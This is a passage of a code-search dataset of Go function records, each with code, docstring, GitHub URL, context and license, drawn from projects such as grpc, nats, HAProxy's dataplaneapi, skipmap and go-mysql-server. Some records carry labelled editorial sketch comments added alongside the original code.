return filterAndPush(s, getSiblingNodes(s.Nodes, siblingAll, nil, nil), m)
}
func (s *Selection) Next() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingNext, nil, nil))
}
func (s *Selection) NextFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingNext, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) NextMatcher(m Matcher) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingNext, nil, nil), m)
}
func (s *Selection) NextAll() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingNextAll, nil, nil))
}
func (s *Selection) NextAllFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingNextAll, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) NextAllMatcher(m Matcher) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingNextAll, nil, nil), m)
}
func (s *Selection) Prev() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingPrev, nil, nil))
}
func (s *Selection) PrevFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingPrev, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) PrevMatcher(m Matcher) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingPrev, nil, nil), m)
}
func (s *Selection) PrevAll() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingPrevAll, nil, nil))
}
func (s *Selection) PrevAllFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingPrevAll, nil, nil), cascadia.MustCompile(selector))
} | BSD 2-Clause Simplified License |
magicsong/sonargo | sonar/projects_service.go | Create | go | func (s *ProjectsService) Create(opt *ProjectsCreateOption) (v *ProjectsCreateObject, resp *http.Response, err error) {
err = s.ValidateCreateOpt(opt)
if err != nil {
return
}
req, err := s.client.NewRequest("POST", "projects/create", opt)
if err != nil {
return
}
v = new(ProjectsCreateObject)
resp, err = s.client.Do(req, v)
if err != nil {
return nil, resp, err
}
return
} | Create Create a project.<br/>Requires 'Create Projects' permission | https://github.com/magicsong/sonargo/blob/103eda7abc20bd192a064b6eb94ba26329e339f1/sonar/projects_service.go#L98-L113 | package sonargo
import "net/http"
type ProjectsService struct {
client *Client
}
const (
ProjectVisibilityPublic = "public"
ProjectVisibilityPrivate = "private"
)
type ProjectsBulkUpdateKeyObject struct {
Keys []*Key `json:"keys,omitempty"`
}
type Key struct {
Duplicate bool `json:"duplicate,omitempty"`
Key string `json:"key,omitempty"`
NewKey string `json:"newKey,omitempty"`
}
type Project struct {
CreationDate string `json:"creationDate,omitempty"`
Key string `json:"key,omitempty"`
Name string `json:"name,omitempty"`
Qualifier string `json:"qualifier,omitempty"`
UUID string `json:"uuid,omitempty"`
Visibility string `json:"visibility,omitempty"`
}
type ProjectsCreateObject struct {
Project *Project `json:"project,omitempty"`
}
type ProjectsBulkDeleteOption struct {
AnalyzedBefore string `url:"analyzedBefore,omitempty"`
OnProvisionedOnly string `url:"onProvisionedOnly,omitempty"`
ProjectIds string `url:"projectIds,omitempty"`
Projects string `url:"projects,omitempty"`
Q string `url:"q,omitempty"`
Qualifiers string `url:"qualifiers,omitempty"`
}
func (s *ProjectsService) BulkDelete(opt *ProjectsBulkDeleteOption) (resp *http.Response, err error) {
err = s.ValidateBulkDeleteOpt(opt)
if err != nil {
return
}
req, err := s.client.NewRequest("POST", "projects/bulk_delete", opt)
if err != nil {
return
}
resp, err = s.client.Do(req, nil)
if err != nil {
return
}
return
}
type ProjectsBulkUpdateKeyOption struct {
DryRun string `url:"dryRun,omitempty"`
From string `url:"from,omitempty"`
Project string `url:"project,omitempty"`
ProjectId string `url:"projectId,omitempty"`
To string `url:"to,omitempty"`
}
func (s *ProjectsService) BulkUpdateKey(opt *ProjectsBulkUpdateKeyOption) (v *ProjectsBulkUpdateKeyObject, resp *http.Response, err error) {
err = s.ValidateBulkUpdateKeyOpt(opt)
if err != nil {
return
}
req, err := s.client.NewRequest("POST", "projects/bulk_update_key", opt)
if err != nil {
return
}
v = new(ProjectsBulkUpdateKeyObject)
resp, err = s.client.Do(req, v)
if err != nil {
return nil, resp, err
}
return
}
type ProjectsCreateOption struct {
Branch string `url:"branch,omitempty"`
Name string `url:"name,omitempty"`
Project string `url:"project,omitempty"`
Visibility string `url:"visibility,omitempty"`
} | Apache License 2.0 |
lindell/multi-gitter | internal/multigitter/terminal/terminal.go | Bold | go | func Bold(text string) string {
return fmt.Sprintf("\033[1m%s\033[0m", text)
} | Bold generates a bold text for the terminal | https://github.com/lindell/multi-gitter/blob/7c0e8705becde451da4b4ed6eb649d5e4aa832fe/internal/multigitter/terminal/terminal.go#L12-L14 | package terminal
import "fmt"
func Link(text, url string) string {
return fmt.Sprintf("\x1B]8;;%s\a%s\x1B]8;;\a", url, text)
} | Apache License 2.0 |
propervillain/moistpetal | subcmd/banner.go | Farewell | go | func Farewell() string {
r := chalk.Red.NewStyle()
s := "" +
" _ _ __ __ _ _ \n" +
" ( | )/_/ \\_\\( | ) \n" +
" __( >O< ) " + r.Style(".Goodbye.") + " ( >O< )__\n" +
" \\_\\(_|_) (_|_)/_/\n"
return s
} | Standard exit banner. | https://github.com/propervillain/moistpetal/blob/2d61232d12b05a09ee5940607e6b66168a1de108/subcmd/banner.go#L23-L31 | package subcmd
import (
"github.com/ttacon/chalk"
)
func Banner() string {
s := "\n" +
" o o o 8\n" +
" 8 8 8\n" +
" ooYoYo. .oPYo. o8 .oPYo. o8P .oPYo. .oPYo. o8P .oPYo. 8\n" +
" 8' 8 8 8 8 8 Yb.. 8 8 8 8oooo8 8 .oooo8 8\n" +
" 8 8 8 8. 8 8 'Yb. 8 8 8 8. 8 8 8 8\n" +
" 8 8 8 `Yooo' 8 `YooP' 8 8YooP' `Yooo' 8 `YooP8 8\n" +
" 8 \n" +
" 8 \n"
s = chalk.Green.NewStyle().Style(s)
return s
} | Apache License 2.0 |
tikv/client-go | txnkv/lock_export.go | NewLock | go | func NewLock(l *kvrpcpb.LockInfo) *Lock {
return txnlock.NewLock(l)
} | NewLock creates a new *Lock. | https://github.com/tikv/client-go/blob/a7d8ea1587e085fa951389656998493e841bccf7/txnkv/lock_export.go#L32-L34 | package txnkv
import (
"github.com/pingcap/kvproto/pkg/kvrpcpb"
"github.com/tikv/client-go/v2/txnkv/txnlock"
)
type Lock = txnlock.Lock
type LockResolver = txnlock.LockResolver
type TxnStatus = txnlock.TxnStatus | Apache License 2.0 |
jmhodges/howsmyssl | vendor/google.golang.org/grpc/internal/metadata/metadata.go | Set | go | func Set(addr resolver.Address, md metadata.MD) resolver.Address {
addr.Attributes = addr.Attributes.WithValues(mdKey, md)
return addr
} | Set sets (overrides) the metadata in addr.
When a SubConn is created with this address, the RPCs sent on it will all
have this metadata. | https://github.com/jmhodges/howsmyssl/blob/b72af40d21cbb12b85932ef1bc18e50459f39263/vendor/google.golang.org/grpc/internal/metadata/metadata.go#L47-L50 | package metadata
import (
"google.golang.org/grpc/metadata"
"google.golang.org/grpc/resolver"
)
type mdKeyType string
const mdKey = mdKeyType("grpc.internal.address.metadata")
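// Editorial sketch (not part of the original file): Set stores the metadata in the
// address attributes under mdKey and Get reads it back, so per-address metadata can be
// round-tripped by a resolver or balancer:
func roundTripSketch(addr resolver.Address, md metadata.MD) metadata.MD {
	return Get(Set(addr, md))
}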
func Get(addr resolver.Address) metadata.MD {
attrs := addr.Attributes
if attrs == nil {
return nil
}
md, _ := attrs.Value(mdKey).(metadata.MD)
return md
} | MIT License |
triggermesh/tm | pkg/resources/pipelineresource/pipelineresource_test.go | TestList | go | func TestList(t *testing.T) {
namespace := "test-namespace"
if ns, ok := os.LookupEnv("NAMESPACE"); ok {
namespace = ns
}
testClient, err := client.NewClient(client.ConfigPath(""))
assert.NoError(t, err)
pipeline := &PipelineResource{Name: "Foo", Namespace: namespace}
_, err = pipeline.List(&testClient)
assert.NoError(t, err)
} | func TestCreate(t *testing.T) {
namespace := "test-namespace"
if ns, ok := os.LookupEnv("NAMESPACE"); ok {
namespace = ns
}
testClient, err := client.NewClient(client.ConfigPath(""))
assert.NoError(t, err)
pipeline := &PipelineResource{Name: "foo-bar", Namespace: namespace}
err = pipeline.Deploy(&testClient)
assert.NoError(t, err)
pipeline = &PipelineResource{Name: "foo-bar", Namespace: namespace}
err = pipeline.Deploy(&testClient)
assert.Error(t, err)
result, err := pipeline.Get(&testClient)
assert.NoError(t, err)
assert.Equal(t, "foo-bar", result.Name)
err = pipeline.Delete(&testClient)
assert.NoError(t, err)
} | https://github.com/triggermesh/tm/blob/7be2b2dc6a9f3deacdaaed20d679014a3d425491/pkg/resources/pipelineresource/pipelineresource_test.go#L51-L63 | package pipelineresource
import (
"os"
"testing"
"github.com/stretchr/testify/assert"
"github.com/triggermesh/tm/pkg/client"
) | Apache License 2.0 |
bitgo/prova | btcec/internal_test.go | TstIsJacobianOnCurve | go | func (curve *KoblitzCurve) TstIsJacobianOnCurve(x, y, z *fieldVal) bool {
var y2, z2, x3, result fieldVal
y2.SquareVal(y).Normalize()
z2.SquareVal(z)
x3.SquareVal(x).Mul(x)
result.SquareVal(&z2).Mul(&z2).MulInt(7).Add(&x3).Normalize()
return y2.Equals(&result)
} | TstIsJacobianOnCurve returns boolean if the point (x,y,z) is on the curve. | https://github.com/bitgo/prova/blob/18f923b3c9245c230eab66778885ad1aa644f049/btcec/internal_test.go#L41-L54 | package btcec
import (
"math/big"
)
const (
TstPubkeyUncompressed = pubkeyUncompressed
TstPubkeyCompressed = pubkeyCompressed
TstPubkeyHybrid = pubkeyHybrid
)
func (f *fieldVal) TstRawInts() [10]uint32 {
return f.n
}
func (f *fieldVal) TstSetRawInts(raw [10]uint32) *fieldVal {
for i := 0; i < len(raw); i++ {
f.n[i] = raw[i]
}
return f
}
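// Editorial note (not part of the original file): TstIsJacobianOnCurve above checks the
// secp256k1 equation y^2 = x^3 + 7 in Jacobian coordinates, where (X, Y, Z) represents
// the affine point (X/Z^2, Y/Z^3); substituting gives Y^2 = X^3 + 7*Z^6, which is the
// identity computed there. A minimal affine-space sketch of the same check, assuming
// big.Int inputs already reduced modulo the field prime p:
func affineIsOnCurveSketch(x, y, p *big.Int) bool {
	y2 := new(big.Int).Mul(y, y) // y^2 mod p
	y2.Mod(y2, p)
	x3 := new(big.Int).Mul(x, x) // x^3 + 7 mod p
	x3.Mul(x3, x)
	x3.Add(x3, big.NewInt(7))
	x3.Mod(x3, p)
	return y2.Cmp(x3) == 0
}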
func (curve *KoblitzCurve) TstFieldJacobianToBigAffine(x, y, z *fieldVal) (*big.Int, *big.Int) {
return curve.fieldJacobianToBigAffine(x, y, z)
} | ISC License |
nats-io/go-nats | examples/nats-echo/main.go | lookupGeo | go | func lookupGeo() string {
c := &http.Client{Timeout: 2 * time.Second}
resp, err := c.Get("https://ipinfo.io")
if err != nil || resp == nil {
log.Fatalf("Could not retrive geo location data: %v", err)
}
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
g := geo{}
if err := json.Unmarshal(body, &g); err != nil {
log.Fatalf("Error unmarshalling geo: %v", err)
}
return g.Region + ", " + g.Country
} | lookup our current region and country.. | https://github.com/nats-io/go-nats/blob/73ffc26dfe70cc3b217df38d209c83b6d07eaf3c/examples/nats-echo/main.go#L153-L166 | package main
import (
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"log"
"net/http"
"os"
"os/signal"
"runtime"
"syscall"
"time"
"github.com/nats-io/go-nats"
)
func usage() {
log.Printf("Usage: nats-echo [-s server] [-creds file] [-t] <subject>\n")
flag.PrintDefaults()
}
func printMsg(m *nats.Msg, i int) {
log.Printf("[#%d] Echoing to [%s]: %q", i, m.Reply, m.Data)
}
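// Editorial sketch (not part of the original file): lookupGeo above decodes an
// ipinfo.io response of which only the region and country fields are used, e.g.
// {"region": "California", "country": "US"}. The same decode, isolated for clarity
// and without the network call:
func decodeGeoSketch(body []byte) (string, error) {
	g := geo{}
	if err := json.Unmarshal(body, &g); err != nil {
		return "", err
	}
	return g.Region + ", " + g.Country, nil
}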
func main() {
var urls = flag.String("s", nats.DefaultURL, "The nats server URLs (separated by comma)")
var userCreds = flag.String("creds", "", "User Credentials File")
var showTime = flag.Bool("t", false, "Display timestamps")
var geoloc = flag.Bool("geo", false, "Display geo location of echo service")
var geo string
log.SetFlags(0)
flag.Usage = usage
flag.Parse()
args := flag.Args()
if len(args) != 1 {
usage()
}
if *geoloc {
geo = lookupGeo()
}
opts := []nats.Option{nats.Name("NATS Echo Service")}
opts = setupConnOptions(opts)
if *userCreds != "" {
opts = append(opts, nats.UserCredentials(*userCreds))
}
nc, err := nats.Connect(*urls, opts...)
if err != nil {
log.Fatal(err)
}
subj, i := args[0], 0
nc.QueueSubscribe(subj, "echo", func(msg *nats.Msg) {
i++
if msg.Reply != "" {
printMsg(msg, i)
if geo != "" {
m := fmt.Sprintf("[%s]: %q", geo, msg.Data)
nc.Publish(msg.Reply, []byte(m))
} else {
nc.Publish(msg.Reply, msg.Data)
}
}
})
nc.Flush()
if err := nc.LastError(); err != nil {
log.Fatal(err)
}
log.Printf("Echo Service listening on [%s]\n", subj)
c := make(chan os.Signal, 1)
signal.Notify(c, syscall.SIGINT)
go func() {
<-c
log.Printf("<caught signal - draining>")
nc.Drain()
}()
if *showTime {
log.SetFlags(log.LstdFlags)
}
runtime.Goexit()
}
func setupConnOptions(opts []nats.Option) []nats.Option {
totalWait := 10 * time.Minute
reconnectDelay := time.Second
opts = append(opts, nats.ReconnectWait(reconnectDelay))
opts = append(opts, nats.MaxReconnects(int(totalWait/reconnectDelay)))
opts = append(opts, nats.DisconnectHandler(func(nc *nats.Conn) {
if !nc.IsClosed() {
log.Printf("Disconnected: will attempt reconnects for %.0fm", totalWait.Minutes())
}
}))
opts = append(opts, nats.ReconnectHandler(func(nc *nats.Conn) {
log.Printf("Reconnected [%s]", nc.ConnectedUrl())
}))
opts = append(opts, nats.ClosedHandler(func(nc *nats.Conn) {
if !nc.IsClosed() {
log.Fatal("Exiting: no servers available")
} else {
log.Fatal("Exiting")
}
}))
return opts
}
type geo struct {
Region string
Country string
} | Apache License 2.0 |
haproxytech/dataplaneapi | handlers/filter.go | Handle | go | func (h *GetFilterHandlerImpl) Handle(params filter.GetFilterParams, principal interface{}) middleware.Responder {
t := ""
if params.TransactionID != nil {
t = *params.TransactionID
}
v, f, err := h.Client.Configuration.GetFilter(params.Index, params.ParentType, params.ParentName, t)
if err != nil {
e := misc.HandleError(err)
return filter.NewGetFilterDefault(int(*e.Code)).WithPayload(e)
}
return filter.NewGetFilterOK().WithPayload(&filter.GetFilterOKBody{Version: v, Data: f})
} | Handle executing the request and returning a response | https://github.com/haproxytech/dataplaneapi/blob/b362aae0b04d0e330bd9dcfbf9f315b670de013b/handlers/filter.go#L139-L151 | package handlers
import (
"github.com/go-openapi/runtime/middleware"
client_native "github.com/haproxytech/client-native/v2"
"github.com/haproxytech/client-native/v2/models"
"github.com/haproxytech/dataplaneapi/haproxy"
"github.com/haproxytech/dataplaneapi/misc"
"github.com/haproxytech/dataplaneapi/operations/filter"
)
type CreateFilterHandlerImpl struct {
Client *client_native.HAProxyClient
ReloadAgent haproxy.IReloadAgent
}
type DeleteFilterHandlerImpl struct {
Client *client_native.HAProxyClient
ReloadAgent haproxy.IReloadAgent
}
type GetFilterHandlerImpl struct {
Client *client_native.HAProxyClient
}
type GetFiltersHandlerImpl struct {
Client *client_native.HAProxyClient
}
type ReplaceFilterHandlerImpl struct {
Client *client_native.HAProxyClient
ReloadAgent haproxy.IReloadAgent
}
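// Editorial sketch (not part of the original file): every Handle method in this file
// follows the same contract: a transaction ID and force_reload are mutually exclusive,
// and outside a transaction the agent is either force-reloaded immediately or a reload
// is queued and its ID returned. A compact illustration of that decision, assuming only
// these two inputs matter:
func reloadModeSketch(transactionID *string, forceReload bool) (mode string, valid bool) {
	inTransaction := transactionID != nil && *transactionID != ""
	switch {
	case inTransaction && forceReload:
		return "", false // "Both force_reload and transaction specified, specify only one"
	case inTransaction:
		return "defer-to-transaction", true
	case forceReload:
		return "reload-now", true
	default:
		return "queue-reload", true
	}
}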
func (h *CreateFilterHandlerImpl) Handle(params filter.CreateFilterParams, principal interface{}) middleware.Responder {
t := ""
v := int64(0)
if params.TransactionID != nil {
t = *params.TransactionID
}
if params.Version != nil {
v = *params.Version
}
if t != "" && *params.ForceReload {
msg := "Both force_reload and transaction specified, specify only one"
c := misc.ErrHTTPBadRequest
e := &models.Error{
Message: &msg,
Code: &c,
}
return filter.NewCreateFilterDefault(int(*e.Code)).WithPayload(e)
}
err := h.Client.Configuration.CreateFilter(params.ParentType, params.ParentName, params.Data, t, v)
if err != nil {
e := misc.HandleError(err)
return filter.NewCreateFilterDefault(int(*e.Code)).WithPayload(e)
}
if params.TransactionID == nil {
if *params.ForceReload {
err := h.ReloadAgent.ForceReload()
if err != nil {
e := misc.HandleError(err)
return filter.NewCreateFilterDefault(int(*e.Code)).WithPayload(e)
}
return filter.NewCreateFilterCreated().WithPayload(params.Data)
}
rID := h.ReloadAgent.Reload()
return filter.NewCreateFilterAccepted().WithReloadID(rID).WithPayload(params.Data)
}
return filter.NewCreateFilterAccepted().WithPayload(params.Data)
}
func (h *DeleteFilterHandlerImpl) Handle(params filter.DeleteFilterParams, principal interface{}) middleware.Responder {
t := ""
v := int64(0)
if params.TransactionID != nil {
t = *params.TransactionID
}
if params.Version != nil {
v = *params.Version
}
if t != "" && *params.ForceReload {
msg := "Both force_reload and transaction specified, specify only one"
c := misc.ErrHTTPBadRequest
e := &models.Error{
Message: &msg,
Code: &c,
}
return filter.NewDeleteFilterDefault(int(*e.Code)).WithPayload(e)
}
err := h.Client.Configuration.DeleteFilter(params.Index, params.ParentType, params.ParentName, t, v)
if err != nil {
e := misc.HandleError(err)
return filter.NewDeleteFilterDefault(int(*e.Code)).WithPayload(e)
}
if params.TransactionID == nil {
if *params.ForceReload {
err := h.ReloadAgent.ForceReload()
if err != nil {
e := misc.HandleError(err)
return filter.NewDeleteFilterDefault(int(*e.Code)).WithPayload(e)
}
return filter.NewDeleteFilterNoContent()
}
rID := h.ReloadAgent.Reload()
return filter.NewDeleteFilterAccepted().WithReloadID(rID)
}
return filter.NewDeleteFilterAccepted()
} | Apache License 2.0 |
bytedance/gopkg | collection/skipmap/skipmap.go | findNodeDelete | go | func (s *Int64Map) findNodeDelete(key int64, preds *[maxLevel]*int64Node, succs *[maxLevel]*int64Node) int {
lFound, x := -1, s.header
for i := int(atomic.LoadInt64(&s.highestLevel)) - 1; i >= 0; i-- {
succ := x.atomicLoadNext(i)
for succ != nil && succ.lessthan(key) {
x = succ
succ = x.atomicLoadNext(i)
}
preds[i] = x
succs[i] = succ
if lFound == -1 && succ != nil && succ.equal(key) {
lFound = i
}
}
return lFound
} | findNodeDelete takes a key and two maximal-height arrays then searches exactly as in a sequential skip-list.
The returned preds and succs always satisfy preds[i] < key <= succs[i]. | https://github.com/bytedance/gopkg/blob/9ad039f26230452b631a627edc075b51a0125d0c/collection/skipmap/skipmap.go#L120-L138 | package skipmap
import (
"sync"
"sync/atomic"
"unsafe"
)
type Int64Map struct {
header *int64Node
length int64
highestLevel int64
}
type int64Node struct {
key int64
value unsafe.Pointer
next optionalArray
mu sync.Mutex
flags bitflag
level uint32
}
func newInt64Node(key int64, value interface{}, level int) *int64Node {
node := &int64Node{
key: key,
level: uint32(level),
}
node.storeVal(value)
if level > op1 {
node.next.extra = new([op2]unsafe.Pointer)
}
return node
}
func (n *int64Node) storeVal(value interface{}) {
atomic.StorePointer(&n.value, unsafe.Pointer(&value))
}
func (n *int64Node) loadVal() interface{} {
return *(*interface{})(atomic.LoadPointer(&n.value))
}
func (n *int64Node) loadNext(i int) *int64Node {
return (*int64Node)(n.next.load(i))
}
func (n *int64Node) storeNext(i int, node *int64Node) {
n.next.store(i, unsafe.Pointer(node))
}
func (n *int64Node) atomicLoadNext(i int) *int64Node {
return (*int64Node)(n.next.atomicLoad(i))
}
func (n *int64Node) atomicStoreNext(i int, node *int64Node) {
n.next.atomicStore(i, unsafe.Pointer(node))
}
func (n *int64Node) lessthan(key int64) bool {
return n.key < key
}
func (n *int64Node) equal(key int64) bool {
return n.key == key
}
func NewInt64() *Int64Map {
h := newInt64Node(0, "", maxLevel)
h.flags.SetTrue(fullyLinked)
return &Int64Map{
header: h,
highestLevel: defaultHighestLevel,
}
}
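// Editorial sketch (not part of the original file): a single-level, non-concurrent
// analogue of the searches in this file, making the documented invariant concrete:
// pred.key < key <= succ.key, with succ nil once key exceeds every stored key.
func findSketch(head *int64Node, key int64) (pred, succ *int64Node) {
	pred = head
	succ = pred.loadNext(0)
	for succ != nil && succ.lessthan(key) {
		pred = succ
		succ = pred.loadNext(0)
	}
	return pred, succ
}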
func (s *Int64Map) findNode(key int64, preds *[maxLevel]*int64Node, succs *[maxLevel]*int64Node) *int64Node {
x := s.header
for i := int(atomic.LoadInt64(&s.highestLevel)) - 1; i >= 0; i-- {
succ := x.atomicLoadNext(i)
for succ != nil && succ.lessthan(key) {
x = succ
succ = x.atomicLoadNext(i)
}
preds[i] = x
succs[i] = succ
if succ != nil && succ.equal(key) {
return succ
}
}
return nil
} | Apache License 2.0 |
cv/sd | cli/parsing.go | exampleFrom | go | func exampleFrom(path string) (string, error) {
file, err := os.Open(path)
if err != nil {
return "", err
}
defer func() {
err = file.Close()
if err != nil {
logrus.Error(err)
}
}()
r := regexp.MustCompile(`^# example: (.*)$`)
scanner := bufio.NewScanner(file)
for scanner.Scan() {
match := r.FindStringSubmatch(scanner.Text())
if len(match) == 2 {
logrus.Debug("Found example line: ", filepath.Join(path), ", set to: ", match[1])
return fmt.Sprintf(" %s", match[1]), nil
}
}
return "", nil
} | /*
Looks for a line like this:
# example: foo bar 1 2 3 | https://github.com/cv/sd/blob/26e084b6c5a13829747ffe298968b33f8a660e6b/cli/parsing.go#L112-L134 | package cli
import (
"bufio"
"fmt"
"os"
"path/filepath"
"regexp"
"strings"
"github.com/Sirupsen/logrus"
"github.com/spf13/cobra"
)
func shortDescriptionFrom(path string) (string, error) {
file, err := os.Open(path)
if err != nil {
return "", err
}
defer func() {
err = file.Close()
if err != nil {
logrus.Error(err)
}
}()
r := regexp.MustCompile(fmt.Sprintf(`^# %s: (.*)$`, regexp.QuoteMeta(filepath.Base(path))))
scanner := bufio.NewScanner(file)
for scanner.Scan() {
match := r.FindStringSubmatch(scanner.Text())
if len(match) == 2 {
logrus.Debug("Found short description line: ", filepath.Join(path), ", set to: ", match[1])
return match[1], nil
}
}
return "", nil
}
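// Editorial sketch (not part of the original file): usageFrom below reads a header such
// as "# usage: deploy ENV [REGION] ..." and derives cobra argument rules; bracketed
// tokens are optional and a trailing "..." makes the command variadic. The counting
// rule in isolation, assuming the same token conventions:
func argRuleSketch(parts []string) (required, optional int, variadic bool) {
	if len(parts) == 0 {
		return 0, 0, false
	}
	for _, p := range parts[1:] {
		switch {
		case p == "...":
			variadic = true
		case strings.HasPrefix(p, "[") && strings.HasSuffix(p, "]"):
			optional++
		default:
			required++
		}
	}
	return required, optional, variadic
}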
func usageFrom(path string) (string, cobra.PositionalArgs, error) {
file, err := os.Open(path)
if err != nil {
return "", cobra.ArbitraryArgs, err
}
defer func() {
err = file.Close()
if err != nil {
logrus.Error(err)
}
}()
r := regexp.MustCompile(`^# usage: (.*)$`)
scanner := bufio.NewScanner(file)
for scanner.Scan() {
match := r.FindStringSubmatch(scanner.Text())
if len(match) == 2 {
line := match[1]
logrus.Debug("Found usage line: ", filepath.Join(path), ", set to: ", line)
parts := strings.Split(line, " ")
if len(parts) == 1 {
logrus.Debug("No args allowed")
return line, cobra.NoArgs, nil
}
var required, optional int
for _, i := range parts[1:] {
if i == "..." {
continue
}
if strings.HasPrefix(i, "[") && strings.HasSuffix(i, "]") {
logrus.Debug("Found optional arg: ", i)
optional++
} else {
logrus.Debug("Found required arg: ", i)
required++
}
}
if parts[len(parts)-1] == "..." {
logrus.Debug("Minimum of ", required, " arguments set")
return match[1], cobra.MinimumNArgs(required), nil
}
logrus.Debug("Arg range of ", required, " and ", required+optional, " set")
return match[1], cobra.RangeArgs(required, required+optional), nil
}
}
logrus.Debug("Any args allowed")
return filepath.Base(path), cobra.ArbitraryArgs, nil
} | MIT License |
tikv/tikv-operator | pkg/util/discovery/discovery.go | IsAPIGroupSupported | go | func IsAPIGroupSupported(discoveryCli discovery.DiscoveryInterface, group string) (bool, error) {
apiGroupList, err := discoveryCli.ServerGroups()
if err != nil {
return false, err
}
for _, apiGroup := range apiGroupList.Groups {
if apiGroup.Name == group {
return true, nil
}
}
return false, nil
} | IsAPIGroupSupported checks if given group is supported by the cluster. | https://github.com/tikv/tikv-operator/blob/c29847e78c7986f6d4ad6899319a857a1ea35c86/pkg/util/discovery/discovery.go#L45-L56 | package discovery
import (
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/client-go/discovery"
)
func IsAPIGroupVersionSupported(discoveryCli discovery.DiscoveryInterface, groupVersion string) (bool, error) {
gv, err := schema.ParseGroupVersion(groupVersion)
if err != nil {
return false, err
}
apiGroupList, err := discoveryCli.ServerGroups()
if err != nil {
return false, err
}
for _, apiGroup := range apiGroupList.Groups {
if apiGroup.Name != gv.Group {
continue
}
for _, version := range apiGroup.Versions {
if version.GroupVersion == gv.String() {
return true, nil
}
}
}
return false, nil
} | Apache License 2.0 |
src-d/go-mysql-server | sql/plan/insert.go | NewInsertInto | go | func NewInsertInto(dst, src sql.Node, isReplace bool, cols []string) *InsertInto {
return &InsertInto{
BinaryNode: BinaryNode{Left: dst, Right: src},
Columns: cols,
IsReplace: isReplace,
}
} | NewInsertInto creates an InsertInto node. | https://github.com/src-d/go-mysql-server/blob/015a39c0e2216bb0dcd98b808c86239693e05a91/sql/plan/insert.go#L29-L35 | package plan
import (
"github.com/src-d/go-mysql-server/sql"
"github.com/src-d/go-mysql-server/sql/expression"
"gopkg.in/src-d/go-errors.v1"
"io"
"strings"
)
var ErrInsertIntoNotSupported = errors.NewKind("table doesn't support INSERT INTO")
var ErrReplaceIntoNotSupported = errors.NewKind("table doesn't support REPLACE INTO")
var ErrInsertIntoMismatchValueCount = errors.NewKind("number of values does not match number of columns provided")
var ErrInsertIntoUnsupportedValues = errors.NewKind("%T is unsupported for inserts")
var ErrInsertIntoDuplicateColumn = errors.NewKind("duplicate column name %v")
var ErrInsertIntoNonexistentColumn = errors.NewKind("invalid column name %v")
var ErrInsertIntoNonNullableDefaultNullColumn = errors.NewKind("column name '%v' is non-nullable but attempted to set default value of null")
var ErrInsertIntoNonNullableProvidedNull = errors.NewKind("column name '%v' is non-nullable but attempted to set a value of null")
type InsertInto struct {
BinaryNode
Columns []string
IsReplace bool
} | Apache License 2.0 |
azure/k8s-infra | hack/generator/pkg/astmodel/object_type.go | WithFunction | go | func (objectType *ObjectType) WithFunction(function Function) *ObjectType {
result := objectType.copy()
result.functions[function.Name()] = function
return result
} | WithFunction creates a new ObjectType with a function (method) attached to it | https://github.com/azure/k8s-infra/blob/b66072047937301e919c4332d7cdd4493739718f/hack/generator/pkg/astmodel/object_type.go#L457-L463 | package astmodel
import (
"go/token"
"sort"
"strings"
"github.com/Azure/k8s-infra/hack/generator/pkg/astbuilder"
"github.com/dave/dst"
"github.com/pkg/errors"
)
type ObjectType struct {
embedded map[TypeName]*PropertyDefinition
properties map[PropertyName]*PropertyDefinition
functions map[string]Function
testcases map[string]TestCase
InterfaceImplementer
}
var EmptyObjectType = NewObjectType()
var _ Type = &ObjectType{}
var _ PropertyContainer = &ObjectType{}
var _ FunctionContainer = &ObjectType{}
func NewObjectType() *ObjectType {
return &ObjectType{
embedded: make(map[TypeName]*PropertyDefinition),
properties: make(map[PropertyName]*PropertyDefinition),
functions: make(map[string]Function),
testcases: make(map[string]TestCase),
InterfaceImplementer: MakeInterfaceImplementer(),
}
}
func (objectType *ObjectType) AsDeclarations(codeGenerationContext *CodeGenerationContext, declContext DeclarationContext) []dst.Decl {
declaration := &dst.GenDecl{
Decs: dst.GenDeclDecorations{
NodeDecs: dst.NodeDecs{
Before: dst.EmptyLine,
After: dst.EmptyLine,
},
},
Tok: token.TYPE,
Specs: []dst.Spec{
&dst.TypeSpec{
Name: dst.NewIdent(declContext.Name.Name()),
Type: objectType.AsType(codeGenerationContext),
},
},
}
astbuilder.AddWrappedComments(&declaration.Decs.Start, declContext.Description, 200)
AddValidationComments(&declaration.Decs.Start, declContext.Validations)
result := []dst.Decl{declaration}
result = append(result, objectType.InterfaceImplementer.AsDeclarations(codeGenerationContext, declContext.Name, nil)...)
result = append(result, objectType.generateMethodDecls(codeGenerationContext, declContext.Name)...)
return result
}
func (objectType *ObjectType) generateMethodDecls(codeGenerationContext *CodeGenerationContext, typeName TypeName) []dst.Decl {
var result []dst.Decl
for _, f := range objectType.Functions() {
funcDef := f.AsFunc(codeGenerationContext, typeName)
result = append(result, funcDef)
}
return result
}
func defineField(fieldName string, fieldType dst.Expr, tag string) *dst.Field {
result := &dst.Field{
Type: fieldType,
Tag: astbuilder.TextLiteral(tag),
}
if fieldName != "" {
result.Names = []*dst.Ident{dst.NewIdent(fieldName)}
}
return result
}
func (objectType *ObjectType) Properties() []*PropertyDefinition {
var result []*PropertyDefinition
for _, property := range objectType.properties {
result = append(result, property)
}
sort.Slice(result, func(left int, right int) bool {
return result[left].propertyName < result[right].propertyName
})
return result
}
func (objectType *ObjectType) Property(name PropertyName) (*PropertyDefinition, bool) {
prop, ok := objectType.properties[name]
return prop, ok
}
func (objectType *ObjectType) EmbeddedProperties() []*PropertyDefinition {
var result []*PropertyDefinition
for _, embedded := range objectType.embedded {
result = append(result, embedded)
}
